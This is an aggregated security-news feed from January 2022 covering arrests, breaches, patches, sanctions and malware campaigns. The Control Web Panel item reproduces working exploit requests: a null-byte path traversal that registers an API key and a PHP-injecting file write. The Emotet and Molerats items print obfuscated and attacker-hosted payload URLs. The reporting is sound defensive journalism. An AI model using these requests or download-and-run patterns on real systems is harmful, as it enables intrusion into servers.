🔒
There are new articles available, click to refresh the page.
Today — 24 January 2022General Security News

ZTNAs Address Requirements VPNs Cannot. Here's Why.

24 January 2022 at 14:52
I recently hopped on the Lookout podcast to talk about virtual private networks (VPNs) and how they've been extended beyond their original use case of connecting remote laptops to your corporate network. Even in this new world where people are using personal devices and cloud apps, VPN continues to be the go-to solution for remote access and cloud access. After my conversation with Hank Schless,

Russian authorities arrested the kingpin of cybercrime Infraud Organization

24 January 2022 at 14:33

Russian authorities arrested four alleged members of the international cyber theft ring tracked as ‘Infraud Organization.’

In February 2008, the US authorities dismantled the global cybercrime organization tracked as Infraud Organization, which was involved in stealing and selling credit card and personal identity data.

The Justice Department announced indictments for 36 people charged with being part of a crime ring. The group has been active since 2010 and was created in Ukraine by Svyatoslav Bondarenko. According to th experts, the activities of the gang caused $530 million in losses.

Bondarenko remained at large, but Russian co-founder Sergey Medvedev was arrested by the authorities in 2018.

Most of the members of the gang were arrested in the US (30), the remaining members come from Australia, Britain, France, Italy, Kosovo, and Serbia.

The indicted leaders of the organization included people from the United States, France, Britain, Egypt, Pakistan, Kosovo, Serbia, Bangladesh, Canada and Australia.

The motto of the Infraud Organization was “In Fraud We Trust,” it has a primary role in the criminal ecosystem as a “premier one-stop shop for cybercriminals worldwide,” explained Deputy Assistant Attorney General David Rybicki.

The Infraud Organization used a number of websites to commercialize the data, it implemented a classic and efficient e-commerce for the stolen card and personal data, implementing also a rating and feedback system and an escrow” service for payments in digital currencies like Bitcoin.

Last week, Russian authorities arrested Andrey Sergeevich Novak, an alleged leader of the gang. According to the TASS media agency, other three individuals (Kirill Samokutyaev, Konstantin Vladimirovich Bergman and Mark Avramovich Bergman) are under house arrest.

Russia’s FSB and law enforcement have detained four members of the Infraud Organization hacking group. Its purported founder Andrey Novak is wanted in the US on the accusations of cybercrime. As a source in law enforcement told TASS, Novak was arrested while three other purported hackers are under a house arrest.

“During intelligence-gathering activities, Russian special services with the operational support of the law enforcement and cooperation of the US law enforcement, managed to establish and detain four members of the Infraud Organization hacking group whose main income was the use of stolen credit card data.” reported the TASS,

“The purported founder of the criminal group, Andrey Sergeevich Novak, wanted in the US on the accusations of cybercrime, has been arrested for two months, another three members of the group – Kirill Samokutyaev, Konstantin Vladimirovich Bergman and Mark Avramovich Bergman have been detained under a house arrest,” the source said.

Novak, aka “Unicc,” “Faaxxx,” and “Faxtrod,” will be judged in Russia and will not be extradited to the United States.

“According to an informed source, Russia is not planning to extradite Novak to the US. “Russian legislation prohibits an extradition of its citizens to a foreign state,” the source said. That said, if a foreign citizen wanted abroad is among the arrested, that individual will be extradited following the investigation and court proceedings in Russia, the source added.” continues the press agency.

Recently, the Russian Federal Security Service (FSB) announced to have shut down the REvil ransomware gang, the group that is behind a long string of attacks against large organizations, such as Kaseya and JBS USA. The FSB claims to have identified all members of the REvil gang and monitored their operations.

The police operation was conducted by Russian authorities following a request by the United States that shared info about members of the gang.

The Russian police arrested 14 alleged members of the ransomware gang and raided 25 addresses seizing computer equipment and cryptocurrency wallets.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, cybercrime)

The post Russian authorities arrested the kingpin of cybercrime Infraud Organization appeared first on Security Affairs.

Emotet spam uses unconventional IP address formats to evade detection

24 January 2022 at 12:05

Experts warn Emotet malware campaign using “unconventional” IP address formats in an attempt to evade detection.

Threat actors behind a recent Emotet malware campaign have been observed using using “unconventional” IP address formats to evade detection. Trend Micro researchers reported that threat actors are using hexadecimal and octal representations of the IP address.

“We observed Emotet spam campaigns using hexadecimal and octal representations of IP addresses, likely to evade detection via pattern matching. Both routines use social engineering techniques to trick users into enabling document macros and automate malware execution. Upon receiving these standards, operating systems (OS) automatically convert the values to the dotted decimal quad representation to initiate the request from the remote servers.” reported Trend Micro.

The attack chain is the same used in previous campaigns, treat actors distribute the malware through weaponized Excel documents using Excel 4.0 Macros, a dated feature used to automate repetitive tasks in the popular Office software.

Once tricked recipient in enabling document macros, the malicious code will contact a URL that’s obfuscated with carets (“h^tt^p^:/^/0xc12a24f5/cc.html”), with the host incorporating a hexadecimal representation of the IP address to execute an HTML application (HTA) code from a remote host under the control of the attackers:

Emotet evasion technique

Experts pointed out that once executed, the macro also invokes cmd.exe > mshta.exe with the URL as an argument to download and execute an HTA code from the remote host. This specific behavior could be used to detect the ongoing attack.

The researchers also spotted another variant of this malspam campaign that obfuscated the URL with carets but the IP contains an octal representation. Decoding the string “h^tt^p^:/^/0056.0151.0121.0114/c.html” into a dotted quad format we obtain 46[.]105[.]81[.]76.

“Moreover, the unconventional use of hexadecimal and octal IP addresses may result in evading current solutions reliant on pattern matching. But in the same vein, the unusual technique in the command lines can be used as a detection opportunity, with security teams using filters as leverage that can be enabled to treat such IP addresses as suspicious and associate them with malware.” concludes the report that also includes indicators of compromise for these attacks.

The Emotet banking trojan has been active at least since 2014, the botnet is operated by a threat actor tracked as TA542. The infamous banking trojan was also used to deliver other malicious code, such as Trickbot and QBot trojans, or ransomware such as ContiProLockRyuk, and Egregor.

In mid-November researchers from multiple cybersecurity firms ([Cryptolaemus], [GData], and [Advanced Intel]) reported that threat actors are using the TrickBot malware to drop an Emoted loader on infected devices. The experts tracked the campaign aimed at rebuilding the Emotet botnet using TrickBot’s infrastructure as Operation Reacharound.

In December, the Emotet malware was observed directly installing Cobalt Strike beacons to give the attackers access to the target network.

Researchers from AdvIntel believe that the return will have a significant impact on the ransomware operations in the threat landscape, likely “the largest threat ecosystem shift in 2021” and beyond due to three reasons:

  1. Emotet’s unmatched continuous loader capabilities
  2. The correlation between these capabilities and the demanded of the contemporary cybercrime market
  3. The return of the TrickBot-Emotet-Ransomware triad resulted from the first two points.

The Emotet botnet was resurrected by its former operator, who was convinced by the Conti ransomware gang. The shutdown of the Emotet operation resulted in the lack of high-quality initial access brokers.

Qbot and TrickBot used Emotet’s service to deploy multiple ransomware strains, including ContiDoppelPaymerEgregorProLockRyuk, and others).

The vacuum left by Emotet shutdown urged its resurgence, for this reason, its return will have a major impact on the threat landscape.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Emotet)

The post Emotet spam uses unconventional IP address formats to evade detection appeared first on Security Affairs.

Hackers Creating Fraudulent Crypto Tokens as Part of 'Rug Pull' Scams

24 January 2022 at 11:09
Misconfigurations in smart contracts are being exploited by scammers to create malicious cryptocurrency tokens with the goal of stealing funds from unsuspecting users. The instances of token fraud in the wild include hiding 99% fee functions and concealing backdoor routines, researchers from Check Point said in a report shared with The Hacker News. Smart contracts are programs stored on the

Emotet Now Using Unconventional IP Address Formats to Evade Detection

24 January 2022 at 07:10
Social engineering campaigns involving the deployment of the Emotet malware botnet have been observed using "unconventional" IP address formats for the first time in a bid to sidestep detection by security solutions. This involves the use of hexadecimal and octal representations of the IP address that, when processed by the underlying operating systems, get automatically converted "to the dotted

High-Severity Rust Programming Bug Could Lead to File, Directory Deletion

24 January 2022 at 06:53
The maintainers of the Rust programming language have released a security update for a high-severity vulnerability that could be abused by a malicious party to purge files and directories from a vulnerable system in an unauthorized manner. "An attacker could use this security issue to trick a privileged program into deleting files and directories the attacker couldn't otherwise access or delete,

Crooks tampering with QR Codes to steal victim money and info, FBI warns

24 January 2022 at 06:40

The FBI warns that cybercriminals are using malicious QR codes to steal their credentials and financial info.

The Federal Bureau of Investigation (FBI) published a public service announcement (PSA) to warn that cybercriminals are using QR codes to steal their credentials and financial info.

QR codes are widely adopted by businesses to facilitate payment. In a classic use case, a business provides customers with a QR code directing them to a site where they can make a payment.

Crooks can replace the QR code with a tampered one and hijack the sender’s payment.

Unaware people that scan the QR codes are redirected to malicious websites that are crafted to steal login and financial information.

“cybercriminals are taking advantage of this technology by directing QR code scans to malicious sites to steal victim data, embedding malware to gain access to the victim’s device, and redirecting payment for cybercriminal use.” reads the FBI’s PSA. “Cybercriminals tamper with both digital and physical QR codes to replace legitimate codes with malicious codes. A victim scans what they think to be a legitimate code but the tampered code directs victims to a malicious site, which prompts them to enter login and financial information.”

Malicious websites could also deliver malware on the victims’ devices or hijack their payments to accounts under their control.

“While QR codes are not malicious in nature, it is important to practice caution when entering financial information as well as providing payment through a site navigated to through a QR code,” the FBI states. 

The FBI announcement includes tips to protect people from such kind of attacks; feds recommend checking the URL obtained by scanning a QR code to make sure it is the intended site and looks authentic. Threat actors could use a malicious domain name that is similar to the intended URL but with typos or a misplaced letter.

Double-check any site navigated to from a QR code before providing login, personal, or financial information.

If scanning a physical QR code, ensure the code has not been tampered with, such as with a sticker placed on top of the original code.

Never download an app from a QR code, avoid making any payment requested through unsolicited email that uses social engineering techniques to trick recipients into scanning the embedded QR code.

Do not download a QR code scanner app from unofficial stores to avoid being infected with tainted apps, most phones today have a built-in scanner through the camera app.

If users will receive a QR code from someone they know, they can reach them via an alternative channel to verify that the code is from them.

Never make payments through a site navigated to from a QR code, it is recommended to manually enter a known and trusted URL to complete the payment.

In November, the FBI Internet Crime Complaint Center (IC3) published an alert to warn the public of fraudulent schemes leveraging cryptocurrency ATMs and Quick Response (QR) codes to complete payment transactions.This payment option makes it quite impossible to recover the money stolen with fraudulent schemes.

QR codes can be used at cryptocurrency ATMs to transfer money to an intended recipient and crooks started using them to receive payments from victims.

Fraudulent schemes include online impersonation in which scammer poses as a familiar entity (i.e. The government, law enforcement, a legal office, or a utility company), romance scams, and lottery schemes (scammer attempt to convince victims that they have won an award).

In all the fraudulent schemes, scammers provide a QR code associated with the scammer’s cryptocurrency wallet that the victim has to use during the transaction. The victims are instructed to make the transition at a physical cryptocurrency ATM where inserting money that can purchase cryptocurrency before transferring them using the provided QR code.

In these schemes, the scammers are in constant online communication with the victims and provide step-by-step instructions to make the payment.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, QR codes)

The post Crooks tampering with QR Codes to steal victim money and info, FBI warns appeared first on Security Affairs.

F5 fixes 25 flaws in BIG-IP, BIG-IQ, and NGINX products

24 January 2022 at 06:15

Cybersecurity provider F5 released security patches to address 25 vulnerabilities affecting its BIG-IP, BIG-IQ, and NGINX products.

Cybersecurity firm F5 announced security patches for 25 vulnerabilities affecting its BIG-IP, BIG-IQ, and NGINX products. Most of the vulnerabilities (23) addressed by the company affect the BIG-IP application delivery controller (ADC), 13 of them have been rated as high-severity issues (CVSS score 7.5).

The issues received CVEs between CVE-2022-23010 to CVE-2022-23032.

The vulnerabilities can cause the termination of the Traffic Management Microkernel (TMM), can lead to an increase in memory resource utilization, freezing virtual servers, or executing JavaScript code.

F5 addressed the flaws with the release of versions 14.x, 15.x, and 16.x.

The security provider also addressed two high-severity vulnerabilities in BIG-IQ centralized management and NGINX controller API management tracked as CVE-2022-23009 and CVE-2022-23008 respectively.

Regarding the CVE-2022-23008 flaw, an authenticated attacker with access to the ‘user’ or ‘admin’ role can use undisclosed API endpoints on NGINX Controller API Management to inject JavaScript code that is executed on managed NGINX data plane instances.

All the medium-severity vulnerabilities affect BIG-IP, but the CVE-2022-23023 issue also impacts BIG-IQ as well.

The company has also addressed a low-severity vulnerability, tracked as CVE-2022-23032, that can lead to a DNS rebinding attack.

The United States Cybersecurity and Infrastructure Security Agency (CISA) published a security advisory to encourage administrators to review the F5 security advisory.

“F5 has released its January 2022 Quarterly Security Notification addressing vulnerabilities affecting multiple versions of BIG-IP, BIG-IQ, and NGINX Controller API Management. A remote attacker could exploit these vulnerabilities to either deny service to, or take control of, an affected system.” reads the advisory published by CISA.

“CISA encourages users and administrators to review the F5 security advisory and install updated software or apply the necessary mitigations as soon as possible.”

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, REvil ransomware)

The post F5 fixes 25 flaws in BIG-IP, BIG-IQ, and NGINX products appeared first on Security Affairs.

Yesterday — 23 January 2022General Security News

OpenSubtitles data breach impacted 7 million subscribers

23 January 2022 at 19:39

OpenSubtitles has suffered a data breach, the maintainers confirmed that the incident impacted 7 Million subscribers.

OpenSubtitles is a popular subtitles websites, it suffered a data breach that affected 6,783,158 subscribers. Exposed data include email and IP addresses, usernames, the country of the user and passwords stored as unsalted MD5 hashes.

The administrator of the website become aware of the hack after a hacker notified them via Telegram in August 2021 demanding the payment of a ransom. The attacker also offered his support to OpenSubtitles to address the security flaws he has found on the website. Administrators of the website agreed to pay the ransom due to the low amount, but after receiving the ransom, the attackers never helped them to secure the website and on 11 January 2022 they leaked the data online.

The hack is the result of poor cyber security since its launch in 2006, administrator OSS said. It seems that the threat actor exploited a SQL injection to access the database of the website.

“In August 2021 we received message on Telegram from a hacker, who showed us proof that he could gain access to the user table of opensubtitles.org, and downloaded a SQL dump from it.” reads a data breach notification published on the website. “He asked for a BTC ransom to not disclose this to public and promise to delete the data.

“We hardly agreed, because it was not low amount of money. He explained us how he could gain access, and helped us fix the error. On the technical side, he was able to hack the low security password of a SuperAdmin, and gained access to an unsecured script, which was available only for SuperAdmins. This script allowed him to perform SQL injections and extract the data.”

The financial data of the subscribers haven’t been compromised by the attacker.

Subscribers are recommended to change opensubtitles.org and opensubtitles.com and forum password. Subscribers that shared opensubtitles.org password somewhere else are recommended to change it as well.

Administrators announced the improvement of the security of the website, including the introduction of new password policy.

“The site SHOULD be more secure now, we improved the way users are connecting to the site, the accounts will be locked after some successful logins, we introduced new password policy, we removed session info from table, IP should not be spoofable anymore, Captchas on login, register, password-reset, CSRF on forms, requests will be cancelled if admins change their IP during session, user passwords are saved in safe form using hash_hmac and sha256 algo with salt and pepper, all md5() passwords are deleted. For IT geeks – yes, we are using password_hash(), with peppered sha256 password, BCRYPT and for verification password_verify()” concludes the notification. “Note that our new site, opensubtitles.com was built with stronger security concerns, and already included all the points described above.”

Subscribers can check if their data have been exposed by querying the data breach notification website Have I Been Pwned that received the list of compromised users.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, OpenSubtitles)

The post OpenSubtitles data breach impacted 7 million subscribers appeared first on Security Affairs.

US CISA added 17 flaws to its Known Exploited Vulnerabilities Catalog

23 January 2022 at 18:13

US CISA added seventeen new actively exploited vulnerabilities to the ‘Known Exploited Vulnerabilities Catalog’.

The ‘Known Exploited Vulnerabilities Catalog‘ is a list of known vulnerabilities that threat actors have abused in attacks and that are required to be addressed by Federal Civilian Executive Branch (FCEB) agencies.

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts recommend also private organizations review the Known Exploited Vulnerabilities Catalog and address the vulnerabilities in their infrastructure.

The Cybersecurity and Infrastructure Security Agency (CISA) this week added seventeen actively exploited vulnerabilities to the Catalog.

The total number of vulnerabilities included in the catalog reached this week 341 vulnerabilities.

CISA is requiring 10 of 17 vulnerabilities added this week to be addressed within February 1st, 2022.

CVE Number CVE Title Required Action Due Date
CVE-2021-32648 October CMS Improper Authentication 2/1/2022
CVE-2021-21315 System Information Library for node.js Command Injection Vulnerability 2/1/2022
CVE-2021-21975 Server Side Request Forgery in vRealize Operations Manager API Vulnerability 2/1/2022
CVE-2021-22991 BIG-IP Traffic Microkernel Buffer Overflow Vulnerability 2/1/2022
CVE-2021-25296 Nagios XI OS Command Injection Vulnerability 2/1/2022
CVE-2021-25297 Nagios XI OS Command Injection Vulnerability 2/1/2022
CVE-2021-25298 Nagios XI OS Command Injection Vulnerability 2/1/2022
CVE-2021-33766 Microsoft Exchange Server Information Disclosure Vulnerability 2/1/2022
CVE-2021-40870 Aviatrix Controller Unrestricted Upload of File Vulnerability 2/1/2022
CVE-2021-35247 SolarWinds Serv-U Improper Input Validation Vulnerability 02/04/2022
CVE-2020-11978 Apache Airflow Command Injection Vulnerability 7/18/2022
CVE-2020-13671 Drupal Core Unrestricted Upload of File Vulnerability 7/18/2022
CVE-2020-13927 Apache Airflow Experimental API Authentication Bypass Vulnerability 7/18/2022
CVE-2020-14864 Oracle Corporate Business Intelligence Enterprise Edition Path Traversal Vulnerability 7/18/2022
CVE-2006-1547 Apache Struts 1 ActionForm Denial of Service Vulnerability 07/21/2022
CVE-2012-0391 Apache Struts 2 Improper Input Validation Vulnerability 07/21/2022
CVE-2018-8453 Microsoft Windows Win32k Privilege Escalation Vulnerability 07/21/2022

One of the issues added this week is a vulnerability in the October CMS, tracked as CVE-2021-32648, which was recently exploited in attacks against websites of the Ukrainian government.

CISA also added a vulnerability, tracked as CVE-2021-35247, recently addressed by SolarWinds in Serv-U products that threat actors are actively exploited in the wild. The company pointed out that all the attack attempts failed.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Known Exploited Vulnerabilities Catalog)

The post US CISA added 17 flaws to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.

Molerats cyberespionage group uses public cloud services as attack infrastructure

23 January 2022 at 14:41

Cyberespionage group Molerats has been observed abusing legitimate cloud services, like Google Drive and Dropbox as attack infrastructure.

Zscaler ThreatLabz analyzed an active espionage campaign carried out by Molerats cyberespionage group (aka TA402, Gaza Hackers Team, Gaza Cybergang, and Extreme Jackal) that abuses legitimate cloud services like Google Drive and Dropbox as attack infrastructure. Public cloud services are used to host malicious payloads or for command-and-control infrastructure in attacks aimed at targets across the Middle East.

In December 2021, ThreatLabz researchers identified several macro-based MS office files that were used in attacks against entities in the Middle East. The bait files were employed in cyber espionage attacks, they contain decoy themes related to geo-political conflicts between Israel and Palestine. Similar bait files were also used in previous cyberespionage campaigns attributed to the Molerats APT group.

MoleRATs is an Arabic-speaking, politically motivated group of hackers that has been active since 2012, 

The researchers discovered that the current campaign has been active since July 2021, the threat actors switched the distribution method in December 2021 and applied minor changes in the .NET backdoor.

“The targets in this campaign were chosen specifically by the threat actor and they included critical members of banking sector in Palestine, people related to Palestinian political parties, as well as human rights activists and journalists in Turkey.” reads the analysis published by Zscaler.

The macro code embedded in the weaponized decoy document simply executes a command using cmd.exe which in turn executes a PowerShell command to download and drop the stage-2 payload from the URL (“http://45.63.49[.]202/document.html”) to the path “C:\ProgramData\document.htm”. Executes servicehost.exe

Then it renames document.htm to servicehost.exe and executes ‘servicehost.exe.’

moletats APT attacks

The .NET-based malware masquerades itself as a WinRAR application by using the icon and other resources and is obfuscated using the ConfuserEx packer.

The backdoor performs the following operations:

1. Collects the machine manufacture and machine model information using WMI which is used for execution environment checks and is later exfiltrated to C2 server.
2. Checks if it should execute in the current execution environment.
3. Creates a mutex with the name of executing binary.
4. Checks if the mutex is created successfully.
5. Determines if it is executed for the first time using the registry key value “HKCU/Software/{name_of_executing_binary}/{name_of_executing_binary}”. 
6. If the registry key doesn’t exist, the code flow goes via a mouse check function which executes the code further only if it detects a change in either of the mouse cursor coordinates. In the end, the mouse check function also creates the same registry key.

The backdoor supports multiple capabilities, such as taking snapshots, listing and uploading files, and running arbitrary commands on the compromised system.

“The major difference between the new attack chain and the old attack chain is seen in the backdoor delivery. Although we are not sure how these RAR/ZIP files were delivered but considering the past attacks they were likely delivered using Phishing PDFs. Additionally, we found a minor variation in the way the backdoor extracted the primary Dropbox account token.” Zscaler ThreatLabz researchers conclude.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Molerats APT)

The post Molerats cyberespionage group uses public cloud services as attack infrastructure appeared first on Security Affairs.

Security Affairs newsletter Round 350

23 January 2022 at 08:57

A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

If you want to also receive for free the newsletter with the international press subscribe here.

Pay attention to Log4j attacks, Dutch National Cybersecurity Centre (NCSC) warns
Vulnerabilities in Control Web Panel potentially expose Linux Servers to hack
US Treasury Department sanctions 4 Ukrainian officials for working with Russian intelligence
A bug in McAfee Agent allows running code with Windows SYSTEM privileges
Experts warn of anomalous spyware campaigns targeting industrial firms
Google Project Zero discloses details of two Zoom zero-day flaws
MoonBounce UEFI implant spotted in a targeted APT41 attack
Conti ransomware gang started leaking files stolen from Bank Indonesia
FBI links the Diavol ransomware to the TrickBot gang
Cisco StarOS flaws could allow remote code execution and information disclosure
Crypto.com hack impacted 483 accounts and resulted in a $34 million theft
Red Cross hit by a sophisticated cyberattack
New BHUNT Stealer targets cryptocurrency wallets
SolarWinds Serv-U bug exploited by threat actors in the wild, Microsoft warns
New DDoS IRC Bot distributed through Korean webHard platforms
UK NCSC shares guidance for organizations to secure their communications with customers
CISA warns of potential critical threats following attacks against Ukraine
Box flaw allowed to bypass MFA and takeover accounts
Is White Rabbit ransomware linked to FIN8 financially motivated group?
AlphV/BlackCat ransomware gang published data stolen from fashion giant Moncler
Financially motivated Earth Lusca threat actors targets organizations worldwide
Law enforcement shutdown the VPN service VPNLab used by many cybercriminal gangs
Microsoft releases Windows out-of-band emergency fixes for Win Server, VPN issues
A small number of Crypto.com users reported suspicious activity on their wallet
Oracle Critical Patch Update for January 2022 will fix 483 new flaws
Zoho fixes a critical vulnerability (CVE-2021-44757) in Desktop Central solutions
High-Severity flaw in 3 WordPress plugins impacts 84,000 websites
Experts warn of attacks using a new Linux variant of SFile ransomware
Kyiv blames Belarus-linked APT UNC1151 for recent cyberattack
European Union simulated a cyber attack on a fictitious Finnish power company
Microsoft spotted a destructive malware campaign targeting Ukraine
A new wave of Qlocker ransomware attacks targets QNAP NAS devices
Threat actors stole $18.7M from the Lympo NTF platform

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)

The post Security Affairs newsletter Round 350 appeared first on Security Affairs.

Before yesterdayGeneral Security News

Pay attention to Log4j attacks, Dutch National Cybersecurity Centre (NCSC) warns

22 January 2022 at 20:34

The Dutch National Cybersecurity Centre (NCSC) warns organizations of risks associated with cyberattacks exploiting the Log4J vulnerability.

The Dutch National Cybersecurity Centre (NCSC) warns organizations to remain vigilant on possible attacks exploiting the Log4J vulnerability.

According to the Dutch agency, threat actors the NCSC will continue to attempt to exploit the Log4Shell flaw in future attacks.

“Partly due to the rapid actions of many organizations, the extent of active abuse appears to be not too bad at the moment. But that doesn’t mean it stops there. It is expected that malicious parties will continue to search for vulnerable systems and carry out targeted attacks in the coming period. It is therefore important to remain vigilant.” states the Dutch NCSC agency. “The NCSC advises organizations to continue to monitor whether vulnerable systems are used and to apply updates or mitigating measures where necessary. In addition, the NCSC advises directors to stay alert by informing themselves about Log4j and the possible impact of abuse on business continuity.”

The risk that cybercriminal groups and nation-state actors could exploit Log4j vulnerabilities in future attacks is still high.

Recently Microsoft posted a warning about a new campaign from a China-based actor it tracks as DEV-0401 to exploit the Log4Shell vulnerability on VMware Horizon systems exposed on the internet, and deploy Night Sky ransomware.

In the last weeks other ransomware gangs exploited the Log4Shell in their attacks, the Conti ransomware gang was the first group that exploited the CVE-2021-44228 flaw since mid December.

In the same period, Bitdefender researchers discovered that threat actors were attempting to exploit the Log4Shell vulnerability to deliver the new Khonsari ransomware on Windows machines

The NCSC will continue to share information through its website and GitHub repository, the latter contains operational information regarding the Log4shell vulnerability in the Log4j logging library. Especially CVE-2021-44228 / CVE-2021-45046 and also covers CVE-2021-4104 / CVE-2021-45105.  

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, log4j)

The post Pay attention to Log4j attacks, Dutch National Cybersecurity Centre (NCSC) warns appeared first on Security Affairs.

Vulnerabilities in Control Web Panel potentially expose Linux Servers to hack

22 January 2022 at 16:29

Two critical security vulnerabilities in Control Web Panel potentially expose Linux servers to remote code execution attacks

Researchers from Octagon Networks disclosed details of two critical security flaws in Control Web Panel that potentially expose Linux servers to remote code execution attacks.

Control Web Panel is a popular open-source Linux control panel for servers and VPS that allows easy management of web hosting environments.

An attacker could chain the vulnerabilities to achieve pre-authenticated remote code execution on vulnerable Linux servers.

The first issue, tracked as CVE-2021-45467, is a file inclusion vulnerability that occurs when a web application is tricked into exposing or running arbitrary files on the webserver.

Experts focused their analysis on vulnerabilities that can be exploited by unauthenticated users or through zero-click attacks, in particular, they tested sections of the panel that are exposed without authentication in the webroot, including /user/loader.php and /user/index.php.

The expert Paulos Yibelo from Octagon Networks discovered that several PHP’s functions (including the require() and include() functions) seem to process /.%00./ as /../. Protections implemented in the application don’t allow to switch to a parent directory (using “..”) but they allow the PHP interpreter to accept a specially crafted string such as “.$00.” that allows bypassing any restriction,

Similarly, while stristr() ignores the null bytes, it still counts its size so it bypasses the check.

This means that it is possible to include any file on the server, if an attacker finds a way to write to a file, it can get preauth RCE.

Despite unix file r/w locking settings in CWP, an attacker can exploit the file inclusion bug to reach the restricted API section, which requires API key to access and is not exposed in the webroot.

Chaining this flaw with an arbitrary file writes vulnerability such as the CVE-2021-45466 flaw, an attacker can gain full remote code execution on the server.

“But by using our file inclusion, sending a request like the following will result in the server registering any API key we want.” explained the expert.

GET https://CWP/user/loader.php?api=1&scripts= .%00./.%00./api/account_new_create&acc=guadaapi&ip=192.168.1.1&keyapi=OCTAGON 

“Now we have added the api key “OCTAGON” requesting from 192.168.1.1 to have access to the full API like the following: 

GET https://CWP/api/?key=OCTAGON&api=add_server is now a valid API request.

The expert found a way to exploit a file write bug in the API section that allowed him to a .TXT file. For example, using a maliciously added key.

https://CWP/api/?key=OCTAGON&api=add_server&DHCP=<?=phpinfo()?>&fileFinal=/ 

That will write to a file called authorized_keys located in the /resources/ folder. Then, using the first file inclusion bug the expert includes it malicious authorized_keys file to get full RCE.

The CWP maintainers have already addressed the flaw with security updates released this month.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Control Web Panel)

The post Vulnerabilities in Control Web Panel potentially expose Linux Servers to hack appeared first on Security Affairs.

Experts Find Strategic Similarities b/w NotPetya and WhisperGate Attacks on Ukraine

22 January 2022 at 14:47
Latest analysis into the wiper malware that targeted dozens of Ukrainian agencies earlier this month has revealed "strategic similarities" to NotPetya malware that was unleashed against the country's infrastructure and elsewhere in 2017. The malware, dubbed WhisperGate, was discovered by Microsoft last week, which said it observed the destructive cyber campaign targeting government, non-profit,

US Treasury Department sanctions 4 Ukrainian officials for working with Russian intelligence

22 January 2022 at 13:20

The U.S. Treasury Department announced sanctions against four current and former Ukrainian government officials for collaborating with Russia.

The U.S. Treasury Department this week announced sanctions against four current and former Ukrainian government officials for having supported influence activities carried out by the Russian government. The officials are accused of having gathered sensitive information about critical infrastructure in Ukraine.

“Today, the Department of the Treasury’s Office of Foreign Assets Control (OFAC) sanctioned four individuals engaged in Russian government-directed influence activities to destabilize Ukraine.” reads the press release published by U.S. Treasury Department. “This action is separate and distinct from the broad range of high impact measures the United States and its Allies and partners are prepared to impose in order to inflict significant costs on the Russian economy and financial system if it were to further invade Ukraine.”

According to the US agency, Russia’s security service, the Federal Security Service (FSB), recruited Ukrainian citizens in key positions to destabilize the political and social contest country.

The four individuals were involved in the influence campaign with different roles, the suspects have supported threat actors in carrying out an influence campaign.

Two of the four individuals, Taras Kozak and Oleh Voloshyn, who are two current Ukrainian Members of Parliament from the party led by Victor Medvedchuk (Medvedchuk), supported Russian disinformation by amplifying false narratives and undermining Ukrainian sovereignty.

Kozak controls several news channels in Ukraine and is accused of having supported the Russian intelligence to denigrate senior members of Ukrainian President Volodymyr Zelenskyy’s inner circle, accusing them of mismanagement of the COVID-19 pandemic.

Voloshyn has worked with Russia-linked actors to undermine Ukrainian government officials and advocate on behalf of Russia.

Vladimir Sivkovich, former Deputy Secretary of the Ukrainian National Security and Defense Council, supported Russian intelligence in carrying out influence operations to support the decision for Ukraine to officially cede Crimea to Russia in exchange for a drawdown of Russian-backed forces in the Donbas.

Volodymyr Oliynyk, is a former Ukrainian official, who currently resides in Moscow. He shares Russia’s anti-Western sentiments and in 2021, he worked for the FSB to gather information about Ukrainian critical infrastructure. 

“As Russia has pursued broad cyber operations against critical infrastructure, it has focused on disrupting one critical infrastructure sector in particular: Ukraine’s energy sector. Russia has also degraded Ukraine’s access to energy products in the middle of winter. Acting” continues the Treasury Department.

The US agency ordered to block all property and interests in property of the designated individuals described above that are in the United States or in the possession or control of U.S. persons. Any entities that are owned, directly or indirectly, 50 percent or more by one or more blocked persons are also blocked. 

“The prohibitions include the making of any contribution or provision of funds, goods, or services by, to, or for the benefit of any blocked person, or the receipt of any contribution or provision of funds, goods, or services from any such person.” concludes the Agency

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, FSB)

The post US Treasury Department sanctions 4 Ukrainian officials for working with Russian intelligence appeared first on Security Affairs.

Molerats Hackers Hiding New Espionage Attacks Behind Public Cloud Infrastructure

22 January 2022 at 10:57
An active espionage campaign has been attributed to the threat actor known as Molerats that abuses legitimate cloud services like Google Drive and Dropbox to host malware payloads and for command-and-control and the exfiltration of data from targets across the Middle East. The cyber offensive is believed to have been underway since at least July 2021, according to cloud-based information

Hackers Planted Secret Backdoor in Dozens of WordPress Plugins and Themes

22 January 2022 at 07:13
In yet another instance of software supply chain attack, dozens of WordPress themes and plugins hosted on a developer's website were backdoored with malicious code in the first half of September 2021 with the goal of infecting further sites. The backdoor gave the attackers full administrative control over websites that used 40 themes and 53 plugins belonging to AccessPress Themes, a Nepal-based

Critical Bugs in Control Web Panel Expose Linux Servers to RCE Attacks

22 January 2022 at 04:04
Researchers have disclosed details of two critical security vulnerabilities in Control Web Panel that could be abused as part of an exploit chain to achieve pre-authenticated remote code execution on affected servers. Tracked as CVE-2021-45467, the issue concerns a case of a file inclusion vulnerability, which occurs when a web application is tricked into exposing or running arbitrary files on
❌